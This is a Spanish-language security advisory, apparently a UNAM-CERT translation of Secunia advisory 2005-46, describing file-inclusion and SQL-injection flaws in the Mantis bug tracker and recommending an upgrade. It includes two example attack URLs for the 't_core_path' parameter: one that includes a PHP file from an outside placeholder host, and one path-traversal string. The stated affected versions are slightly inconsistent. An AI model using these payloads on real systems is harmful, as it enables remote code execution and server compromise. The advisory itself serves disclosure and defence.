Se reportaron varias vulnerabilidades en Mantis, que pueden explotarse para realizar ataques de inyeción de código y comprometer un sistema vulnerable.
Secunia Research Advisory
2005-46
mantis | == | 0.19.2 |
mantis | == | 1.0.0.rc2 |
Se reportaron varias vulnerabilidades en Mantis, que pueden explotarse por personas maliciosas para realizar ataques de inyeción de código y comprometer un sistema vulnerable.
La entrada que se pasa al parámetro "t_core_path" dentro de "bug_sponsorship_list_view_inc.php" no es verificada apropiadamente antes de utilizarse para incluir archivos. Esto puede explotarse para agregar archivos arbitrarios desde fuentes locales y externas.
Ejemplos:
http://[host]/bug_sponsorship_list_view_inc.php-t_core_path=http://[host]/[file].php- http://[host]/bug_sponsorship_list_view_inc.php-t_core_path=../../../../../../../[file]%00
Una explotación exitosa requiere que este habilitado "register_globals".
Existe una falla en la verificación de cierta entrada, antes de utilizarse en peticiones SQL. Esto puede explotarse para manipular peticiones SQL inyectando código SQL arbitrario.
Las vulnerabilidades fueron reportadas en las versiones 0.9.12 y 1.0.0rc2. Otras versiones también podrián ser afectadas.
Manipulación de información.
Acceso al sistema.
Actualizar a la versión 0.19.3
http://sourceforge.net/project/showfiles.php-group_id=14963
Mayor información.
http://secunia.com/secunia_research/2005-46/advisory/La Coordinación de Seguridad de la Información/UNAM-CERT agradece el apoyo en la elaboración ó traducción y revisión de éste Documento a:
UNAM-CERT
Equipo de Respuesta a Incidentes UNAM
Coordinación de Seguridad de la Información
incidentes at seguridad.unam.mx
phishing at seguridad.unam.mx
http://www.cert.org.mx
http://www.seguridad.unam.mx
ftp://ftp.seguridad.unam.mx
Tel: 56 22 81 69
Fax: 56 22 80 47
Aviso legal |
Créditos |
Staff |
Administración
Copyright © Todos los derechos reservados
UNAM - CERT